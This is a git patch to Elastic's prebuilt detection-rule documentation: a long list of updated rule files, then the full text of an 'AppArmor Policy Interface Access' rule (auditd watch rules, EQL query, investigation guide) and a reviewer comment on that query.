From ddc092e9542a16aa5b7a22494919c33fed838eff Mon Sep 17 00:00:00 2001 
From: tradebot-elastic <178941316+tradebot-elastic@users.noreply.github.com> Date: Tue, 24 Mar 2026 15:44:11 +0000 Subject: [PATCH] Update latest docs --- ...-apparmor-policy-interface-access.asciidoc | 142 +++++ ...pparmor-policy-violation-detected.asciidoc | 133 +++++ ...e-compilation-via-apparmor-parser.asciidoc | 160 ++++++ ...to-establish-vscode-remote-tunnel.asciidoc | 132 +++++ ...m-uncommon-s3-client-by-rare-user.asciidoc | 141 +++++ ...ws-cloudshell-environment-created.asciidoc | 137 +++++ ...s-by-identity-from-unusual-source.asciidoc | 125 ++++ ...ntication-from-multiple-countries.asciidoc | 149 +++++ ...-by-arc-cluster-credential-access.asciidoc | 136 +++++ ...-component-object-model-hijacking.asciidoc | 215 +++++++ ...n-to-commonly-abused-web-services.asciidoc | 350 ++++++++++++ ...on-a-process-exhibiting-cpu-spike.asciidoc | 174 ++++++ ...-rule-8-19-18-dynamic-linker-copy.asciidoc | 197 +++++++ ...-elastic-agent-service-terminated.asciidoc | 155 +++++ ...-alert-followed-by-telemetry-loss.asciidoc | 131 +++++ ...device-code-grant-by-unusual-user.asciidoc | 163 ++++++ ...9-18-execution-via-openclaw-agent.asciidoc | 133 +++++ ...cessed-sensitive-credential-files.asciidoc | 114 ++++ ...ted-a-launchagent-or-launchdaemon.asciidoc | 114 ++++ ...me-python-spawned-a-shell-on-host.asciidoc | 117 ++++ ...time-seen-dns-query-to-rmm-domain.asciidoc | 219 +++++++ ...te-monitoring-and-management-tool.asciidoc | 540 ++++++++++++++++++ ...in-followed-by-siem-alert-by-user.asciidoc | 105 ++++ ...process-accessing-sensitive-files.asciidoc | 182 ++++++ ...cess-connection-to-unusual-domain.asciidoc | 152 +++++ ...-19-18-ibm-qradar-external-alerts.asciidoc | 115 ++++ ...ingress-transfer-via-windows-bits.asciidoc | 171 ++++++ ...module-load-from-unusual-location.asciidoc | 179 ++++++ ...figmap-access-via-azure-arc-proxy.asciidoc | 141 +++++ ...count-tokenfilter-policy-disabled.asciidoc | 159 ++++++ ...nge-inbox-forwarding-rule-created.asciidoc | 140 +++++ 
...arepoint-site-administrator-added.asciidoc | 133 +++++ ...oint-site-sharing-policy-weakened.asciidoc | 142 +++++ ...access-by-unusual-user-and-client.asciidoc | 134 +++++ ...r-impersonation-by-unusual-client.asciidoc | 145 +++++ ...lure-from-the-same-source-address.asciidoc | 175 ++++++ ...agement-tool-vendors-on-same-host.asciidoc | 226 ++++++++ ...-scripts-in-the-startup-directory.asciidoc | 167 ++++++ ...takeover-logon-from-new-source-ip.asciidoc | 113 ++++ ...ccount-takeover-mixed-logon-types.asciidoc | 113 ++++ ...al-data-exfiltration-through-curl.asciidoc | 162 ++++++ ...al-data-exfiltration-through-wget.asciidoc | 167 ++++++ ...tial-data-exfiltration-via-rclone.asciidoc | 117 ++++ ...tential-database-dumping-activity.asciidoc | 150 +++++ ...8-potential-http-downgrade-attack.asciidoc | 113 ++++ ...teral-tool-transfer-via-smb-share.asciidoc | 134 +++++ ...notepad-markdown-rce-exploitation.asciidoc | 118 ++++ ...rotocol-tunneling-via-cloudflared.asciidoc | 114 ++++ ...ntial-protocol-tunneling-via-yuze.asciidoc | 120 ++++ ...ential-remote-install-via-msiexec.asciidoc | 133 +++++ ...lege-escalation-via-cve-2026-3888.asciidoc | 147 +++++ ...8-privileged-accounts-brute-force.asciidoc | 155 +++++ ...-remote-execution-via-file-shares.asciidoc | 162 ++++++ ...8-remote-file-copy-via-teamviewer.asciidoc | 143 +++++ ...mote-file-download-via-powershell.asciidoc | 166 ++++++ ...e-download-via-script-interpreter.asciidoc | 146 +++++ ...t-access-launch-after-msi-install.asciidoc | 123 ++++ ...t-encoded-python-script-execution.asciidoc | 128 +++++ ...ous-javascript-execution-via-deno.asciidoc | 117 ++++ ...ess-access-via-direct-system-call.asciidoc | 162 ++++++ ...-shell-execution-via-velociraptor.asciidoc | 129 +++++ ...-apparmor-policy-management-files.asciidoc | 167 ++++++ ...le-creation-alternate-data-stream.asciidoc | 150 +++++ ...odifying-genai-configuration-file.asciidoc | 146 +++++ ...ver-discovery-or-fuzzing-activity.asciidoc | 142 +++++ 
...tential-command-injection-request.asciidoc | 229 ++++++++ ...ial-spike-in-error-response-codes.asciidoc | 148 +++++ ...er-suspicious-user-agent-requests.asciidoc | 175 ++++++ ...-19-18-windows-event-logs-cleared.asciidoc | 115 ++++ .../prebuilt-rules-8-19-18-appendix.asciidoc | 75 +++ .../prebuilt-rules-8-19-18-summary.asciidoc | 150 +++++ ...ebuilt-rules-downloadable-updates.asciidoc | 5 + .../prebuilt-rules-reference.asciidoc | 138 +++-- .../prebuilt-rules/rule-desc-index.asciidoc | 26 +- .../apparmor-policy-interface-access.asciidoc | 142 +++++ ...pparmor-policy-violation-detected.asciidoc | 133 +++++ ...e-compilation-via-apparmor-parser.asciidoc | 160 ++++++ ...to-establish-vscode-remote-tunnel.asciidoc | 9 +- ...m-uncommon-s3-client-by-rare-user.asciidoc | 141 +++++ ...ws-cloudshell-environment-created.asciidoc | 137 +++++ ...s-by-identity-from-unusual-source.asciidoc | 125 ++++ ...ntication-from-multiple-countries.asciidoc | 149 +++++ ...-by-arc-cluster-credential-access.asciidoc | 136 +++++ .../component-object-model-hijacking.asciidoc | 9 +- ...n-to-commonly-abused-web-services.asciidoc | 5 +- ...on-a-process-exhibiting-cpu-spike.asciidoc | 11 +- .../rule-details/dynamic-linker-copy.asciidoc | 13 +- .../elastic-agent-service-terminated.asciidoc | 43 +- ...-alert-followed-by-telemetry-loss.asciidoc | 4 +- .../execution-via-openclaw-agent.asciidoc | 6 +- ...ile-or-directory-deletion-command.asciidoc | 12 +- ...cessed-sensitive-credential-files.asciidoc | 114 ++++ ...ted-a-launchagent-or-launchdaemon.asciidoc | 114 ++++ ...me-python-spawned-a-shell-on-host.asciidoc | 117 ++++ ...time-seen-dns-query-to-rmm-domain.asciidoc | 135 ++++- ...te-monitoring-and-management-tool.asciidoc | 14 +- ...in-followed-by-siem-alert-by-user.asciidoc | 5 +- ...process-accessing-sensitive-files.asciidoc | 5 +- ...cess-connection-to-unusual-domain.asciidoc | 12 +- .../ibm-qradar-external-alerts.asciidoc | 115 ++++ ...ingress-transfer-via-windows-bits.asciidoc | 4 +- 
...module-load-from-unusual-location.asciidoc | 12 +- ...figmap-access-via-azure-arc-proxy.asciidoc | 141 +++++ ...count-tokenfilter-policy-disabled.asciidoc | 8 +- ...nge-inbox-forwarding-rule-created.asciidoc | 26 +- ...arepoint-site-administrator-added.asciidoc | 133 +++++ ...access-by-unusual-user-and-client.asciidoc | 34 +- ...r-impersonation-by-unusual-client.asciidoc | 15 +- ...lure-from-the-same-source-address.asciidoc | 14 +- ...agement-tool-vendors-on-same-host.asciidoc | 226 ++++++++ ...-scripts-in-the-startup-directory.asciidoc | 4 +- ...takeover-logon-from-new-source-ip.asciidoc | 18 +- ...ccount-takeover-mixed-logon-types.asciidoc | 18 +- ...al-data-exfiltration-through-curl.asciidoc | 22 +- ...al-data-exfiltration-through-wget.asciidoc | 18 +- ...tial-data-exfiltration-via-rclone.asciidoc | 117 ++++ ...tential-database-dumping-activity.asciidoc | 150 +++++ .../potential-http-downgrade-attack.asciidoc | 4 +- ...teral-tool-transfer-via-smb-share.asciidoc | 8 +- ...notepad-markdown-rce-exploitation.asciidoc | 5 +- ...rotocol-tunneling-via-cloudflared.asciidoc | 114 ++++ ...ntial-protocol-tunneling-via-yuze.asciidoc | 120 ++++ ...ential-remote-install-via-msiexec.asciidoc | 4 +- ...lege-escalation-via-cve-2026-3888.asciidoc | 147 +++++ .../privileged-accounts-brute-force.asciidoc | 155 +++++ .../remote-execution-via-file-shares.asciidoc | 4 +- .../remote-file-copy-via-teamviewer.asciidoc | 4 +- ...mote-file-download-via-powershell.asciidoc | 4 +- ...e-download-via-script-interpreter.asciidoc | 5 +- ...t-access-launch-after-msi-install.asciidoc | 123 ++++ ...t-encoded-python-script-execution.asciidoc | 8 +- ...ous-javascript-execution-via-deno.asciidoc | 117 ++++ ...ess-access-via-direct-system-call.asciidoc | 20 +- ...-shell-execution-via-velociraptor.asciidoc | 129 +++++ ...-apparmor-policy-management-files.asciidoc | 167 ++++++ ...le-creation-alternate-data-stream.asciidoc | 6 +- ...odifying-genai-configuration-file.asciidoc | 12 +- 
...ver-discovery-or-fuzzing-activity.asciidoc | 9 +- ...tential-command-injection-request.asciidoc | 9 +- ...ial-spike-in-error-response-codes.asciidoc | 9 +- ...r-potential-sql-injection-request.asciidoc | 4 +- ...er-suspicious-user-agent-requests.asciidoc | 9 +- .../windows-event-logs-cleared.asciidoc | 4 +- docs/index.asciidoc | 2 + 144 files changed, 14925 insertions(+), 244 deletions(-) create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-apparmor-policy-interface-access.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-apparmor-policy-violation-detected.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-apparmor-profile-compilation-via-apparmor-parser.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-attempt-to-establish-vscode-remote-tunnel.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-aws-api-activity-from-uncommon-s3-client-by-rare-user.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-aws-cloudshell-environment-created.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-azure-arc-cluster-credential-access-by-identity-from-unusual-source.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-azure-service-principal-authentication-from-multiple-countries.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-azure-service-principal-sign-in-followed-by-arc-cluster-credential-access.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-component-object-model-hijacking.asciidoc create 
mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-connection-to-commonly-abused-web-services.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-detection-alert-on-a-process-exhibiting-cpu-spike.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-dynamic-linker-copy.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-elastic-agent-service-terminated.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-elastic-defend-alert-followed-by-telemetry-loss.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-entra-id-oauth-device-code-grant-by-unusual-user.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-execution-via-openclaw-agent.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-first-time-python-accessed-sensitive-credential-files.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-first-time-python-created-a-launchagent-or-launchdaemon.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-first-time-python-spawned-a-shell-on-host.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-first-time-seen-dns-query-to-rmm-domain.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-first-time-seen-remote-monitoring-and-management-tool.asciidoc create mode 100644 
docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-fortigate-ssl-vpn-login-followed-by-siem-alert-by-user.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-genai-process-accessing-sensitive-files.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-genai-process-connection-to-unusual-domain.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-ibm-qradar-external-alerts.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-ingress-transfer-via-windows-bits.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-kernel-module-load-from-unusual-location.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-kubernetes-secret-or-configmap-access-via-azure-arc-proxy.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-local-account-tokenfilter-policy-disabled.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-m365-exchange-inbox-forwarding-rule-created.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-m365-sharepoint-site-administrator-added.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-m365-sharepoint-site-sharing-policy-weakened.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-microsoft-graph-request-email-access-by-unusual-user-and-client.asciidoc create mode 100644 
docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-microsoft-graph-request-user-impersonation-by-unusual-client.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-multiple-logon-failure-from-the-same-source-address.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-multiple-remote-management-tool-vendors-on-same-host.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-persistent-scripts-in-the-startup-directory.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-potential-account-takeover-logon-from-new-source-ip.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-potential-account-takeover-mixed-logon-types.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-potential-data-exfiltration-through-curl.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-potential-data-exfiltration-through-wget.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-potential-data-exfiltration-via-rclone.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-potential-database-dumping-activity.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-potential-http-downgrade-attack.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-potential-lateral-tool-transfer-via-smb-share.asciidoc create mode 100644 
docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-potential-notepad-markdown-rce-exploitation.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-potential-protocol-tunneling-via-cloudflared.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-potential-protocol-tunneling-via-yuze.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-potential-remote-install-via-msiexec.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-potential-snap-confine-privilege-escalation-via-cve-2026-3888.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-privileged-accounts-brute-force.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-remote-execution-via-file-shares.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-remote-file-copy-via-teamviewer.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-remote-file-download-via-powershell.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-remote-file-download-via-script-interpreter.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-remote-management-access-launch-after-msi-install.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-rot-encoded-python-script-execution.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-suspicious-javascript-execution-via-deno.asciidoc create mode 100644 
docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-suspicious-process-access-via-direct-system-call.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-suspicious-shell-execution-via-velociraptor.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-suspicious-write-attempt-to-apparmor-policy-management-files.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-unusual-file-creation-alternate-data-stream.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-unusual-process-modifying-genai-configuration-file.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-web-server-discovery-or-fuzzing-activity.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-web-server-potential-command-injection-request.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-web-server-potential-spike-in-error-response-codes.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-web-server-suspicious-user-agent-requests.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-windows-event-logs-cleared.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rules-8-19-18-appendix.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rules-8-19-18-summary.asciidoc create mode 100644 docs/detections/prebuilt-rules/rule-details/apparmor-policy-interface-access.asciidoc create mode 100644 
docs/detections/prebuilt-rules/rule-details/apparmor-policy-violation-detected.asciidoc create mode 100644 docs/detections/prebuilt-rules/rule-details/apparmor-profile-compilation-via-apparmor-parser.asciidoc create mode 100644 docs/detections/prebuilt-rules/rule-details/aws-api-activity-from-uncommon-s3-client-by-rare-user.asciidoc create mode 100644 docs/detections/prebuilt-rules/rule-details/aws-cloudshell-environment-created.asciidoc create mode 100644 docs/detections/prebuilt-rules/rule-details/azure-arc-cluster-credential-access-by-identity-from-unusual-source.asciidoc create mode 100644 docs/detections/prebuilt-rules/rule-details/azure-service-principal-authentication-from-multiple-countries.asciidoc create mode 100644 docs/detections/prebuilt-rules/rule-details/azure-service-principal-sign-in-followed-by-arc-cluster-credential-access.asciidoc create mode 100644 docs/detections/prebuilt-rules/rule-details/first-time-python-accessed-sensitive-credential-files.asciidoc create mode 100644 docs/detections/prebuilt-rules/rule-details/first-time-python-created-a-launchagent-or-launchdaemon.asciidoc create mode 100644 docs/detections/prebuilt-rules/rule-details/first-time-python-spawned-a-shell-on-host.asciidoc create mode 100644 docs/detections/prebuilt-rules/rule-details/ibm-qradar-external-alerts.asciidoc create mode 100644 docs/detections/prebuilt-rules/rule-details/kubernetes-secret-or-configmap-access-via-azure-arc-proxy.asciidoc create mode 100644 docs/detections/prebuilt-rules/rule-details/m365-sharepoint-site-administrator-added.asciidoc create mode 100644 docs/detections/prebuilt-rules/rule-details/multiple-remote-management-tool-vendors-on-same-host.asciidoc create mode 100644 docs/detections/prebuilt-rules/rule-details/potential-data-exfiltration-via-rclone.asciidoc create mode 100644 docs/detections/prebuilt-rules/rule-details/potential-database-dumping-activity.asciidoc create mode 100644 
docs/detections/prebuilt-rules/rule-details/potential-protocol-tunneling-via-cloudflared.asciidoc create mode 100644 docs/detections/prebuilt-rules/rule-details/potential-protocol-tunneling-via-yuze.asciidoc create mode 100644 docs/detections/prebuilt-rules/rule-details/potential-snap-confine-privilege-escalation-via-cve-2026-3888.asciidoc create mode 100644 docs/detections/prebuilt-rules/rule-details/privileged-accounts-brute-force.asciidoc create mode 100644 docs/detections/prebuilt-rules/rule-details/remote-management-access-launch-after-msi-install.asciidoc create mode 100644 docs/detections/prebuilt-rules/rule-details/suspicious-javascript-execution-via-deno.asciidoc create mode 100644 docs/detections/prebuilt-rules/rule-details/suspicious-shell-execution-via-velociraptor.asciidoc create mode 100644 docs/detections/prebuilt-rules/rule-details/suspicious-write-attempt-to-apparmor-policy-management-files.asciidoc diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-apparmor-policy-interface-access.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-apparmor-policy-interface-access.asciidoc new file mode 100644 index 0000000000..fedee767a8 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-apparmor-policy-interface-access.asciidoc 
@@ -0,0 +1,142 @@
+[[prebuilt-rule-8-19-18-apparmor-policy-interface-access]]
+=== AppArmor Policy Interface Access
+
+Identifies access to AppArmor kernel policy control interfaces through the .load, .replace, or .remove files under /sys/kernel/security/apparmor/. These special files are used to load, modify, or remove AppArmor profiles and are rarely accessed during normal system activity outside of policy administration. Reads or writes to these interfaces may indicate legitimate security configuration changes, but can also reflect defense evasion, unauthorized policy tampering, or the installation of attacker-controlled profiles. This detection is especially valuable on systems where AppArmor policy changes are uncommon or tightly controlled.
+
+*Rule type*: eql
+
+*Rule indices*:
+
+* logs-auditd_manager.auditd-*
+* auditbeat-*
+
+*Severity*: low
+
+*Risk score*: 21
+
+*Runs every*: 5m
+
+*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>)
+
+*Maximum alerts per execution*: 100
+
+*References*:
+
+* https://cdn2.qualys.com/advisory/2026/03/10/crack-armor.txt
+* https://blog.qualys.com/vulnerabilities-threat-research/2026/03/12/crackarmor-critical-apparmor-flaws-enable-local-privilege-escalation-to-root
+
+*Tags*:
+
+* Domain: Endpoint
+* OS: Linux
+* Use Case: Threat Detection
+* Tactic: Defense Evasion
+* Data Source: Auditd Manager
+* Resources: Investigation Guide
+
+*Version*: 1
+
+*Rule authors*:
+
+* Elastic
+
+*Rule license*: Elastic License v2
+
+
+==== Investigation guide
+
+
+
+*Triage and analysis*
+
+
+> **Disclaimer**:
+> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.
+
+
+*Investigating AppArmor Policy Interface Access*
+
+
+This rule detects reads, writes, or deletions against the Linux AppArmor policy control files that load, replace, or remove profiles, actions that directly change how the kernel restricts processes. That matters because unauthorized access to these interfaces can disable enforcement or install permissive rules that hide malicious activity; for example, an intruder with elevated privileges might replace a profile protecting a web server so a dropped backdoor can run and touch sensitive files without confinement.
+
+
+*Possible investigation steps*
+
+
+- Determine whether the access coincides with an approved AppArmor administration task by validating the initiating account, privilege escalation history, maintenance windows, and any related change or deployment records for the host.
+- Review the full execution lineage around the event to confirm whether the interface was touched by expected policy management activity such as package updates or configuration automation versus an interactive shell, ad hoc script, or remote session.
+- Inspect recent changes to AppArmor profile files and deployment artifacts under standard policy locations to identify which profile was loaded, replaced, or removed and whether the resulting policy became weaker or disabled confinement for sensitive services.
+- Correlate the activity with nearby authentication, sudo, process execution, and network events on the same system to assess whether the policy modification was part of normal administration or followed potentially malicious hands-on-keyboard behavior.
+- If the change is not authorized, preserve the modified policy artifacts and relevant host evidence, then restore known-good AppArmor profiles from a trusted source and verify enforcement is active to prevent further defense evasion.
+
+
+*False positive analysis*
+
+
+- Approved system maintenance such as package updates, service installation, or boot-time policy initialization can legitimately access AppArmor `.load` or `.replace`, so verify the parent process and command line map to expected package management or startup activity during a documented change window.
+- An administrator may manually reload, replace, or remove an AppArmor profile while troubleshooting or deploying a local service, so confirm the initiating user, any `sudo` or privileged session history, and recent edits to AppArmor profile files align with an authorized operational task.
+
+
+*Response and remediation*
+
+
+- Isolate the affected Linux host from the network while preserving forensic access, terminate the process or shell session that wrote to `/sys/kernel/security/apparmor/.load`, `.replace`, or `.remove`, and disable the originating account’s privileged access until the scope is understood.
+- Collect and review the active AppArmor state and on-disk profiles from `/etc/apparmor.d/`, recent shell history, sudo activity, and any scripts or package hooks involved, then remove attacker-added profiles and reverse any profile changes that weakened or removed confinement.
+- Hunt for and delete persistence that relied on the AppArmor change, including malicious systemd units, cron entries, startup scripts, modified container launch settings, or dropped binaries that were able to run only after the profile was replaced or removed.
+- Restore the system to a known-good state by reinstalling trusted AppArmor policy packages or redeploying validated profiles from source control, reloading them with approved tools, and rebuilding the host from a clean image if root access or core security files were modified.
+- Escalate to incident response immediately if the tampered profile protected an internet-facing service, credential store, or security tool, if the same behavior is seen on multiple hosts, or if the attacker also changed sudoers, SSH access, or other local security controls.
+- Harden the environment by restricting who can administer AppArmor, requiring signed or change-controlled profile updates, alerting on future writes to the AppArmor policy interfaces, and validating that critical services remain in enforce mode after patching or deployment.
+
+==== Setup
+
+
+
+*Setup*
+
+
+This rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system.
+```
+Kibana -->
+Management -->
+Integrations -->
+Auditd Manager -->
+Add Auditd Manager
+```
+`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the "audit rules" configuration box or the "auditd rule files" box by specifying a file to read the audit rules from.
+For this detection rule to trigger, the following additional audit rules are required to be added to the integration:
+```
+-w /sys/kernel/security/apparmor/.load -p rw -k apparmor_policy_change
+-w /sys/kernel/security/apparmor/.replace -p rw -k apparmor_policy_change
+-w /sys/kernel/security/apparmor/.remove -p rw -k apparmor_policy_change
+```
+Add the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.
+
+
+==== Rule query
+
+
+[source, js]
+----------------------------------
+file where host.os.type == "linux" and event.action in ("opened-file", "wrote-to-file", "deleted") and
+file.path in (
+ "/sys/kernel/security/apparmor/.load", ".load",
+ "/sys/kernel/security/apparmor/.replace", ".replace",
+ "/sys/kernel/security/apparmor/.remove", ".remove"
+)
+
+----------------------------------
+
+*Framework*: MITRE ATT&CK^TM^
+
+* Tactic:
+** Name: Defense Evasion
+** ID: TA0005
+** Reference URL: https://attack.mitre.org/tactics/TA0005/
+* Technique:
+** Name: Impair Defenses
+** ID: T1562
+** Reference URL: https://attack.mitre.org/techniques/T1562/
+* Sub-technique:
+** Name: Disable or Modify Tools
+** ID: T1562.001
+** Reference URL: https://attack.mitre.org/techniques/T1562/001/
diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-apparmor-policy-violation-detected.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-apparmor-policy-violation-detected.asciidoc
new file mode 100644
index 0000000000..424c18bddc
--- /dev/null
+++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-apparmor-policy-violation-detected.asciidoc
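Review bot: The bare `".load"`, `".replace"` and `".remove"` entries in the rule query will also match a relative-path open of any file with one of those names in a process's current directory, not only the securityfs control files, so the description should say why they are included (presumably because auditd reports the path as passed to the syscall) and list them under false positives. The query additionally accepts `event.action == "deleted"` while the setup's audit watches are `-p rw`; either document which watch permission is expected to produce that action or drop `"deleted"` from the query, since the entries under `/sys/kernel/security/apparmor/` are, as far as I know, not unlinkable. If the integration surfaces the audit rule key (Auditbeat places `-k` values in `tags`, as far as I recall), anchoring on `apparmor_policy_change` would keep the relative-path forms without widening the match; alternatively, constraining `process.working_directory` to `/sys/kernel/security/apparmor` for the bare names would do, if that field is populated from the CWD record.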
@@ -0,0 +1,133 @@
+[[prebuilt-rule-8-19-18-apparmor-policy-violation-detected]]
+=== AppArmor Policy Violation Detected
+
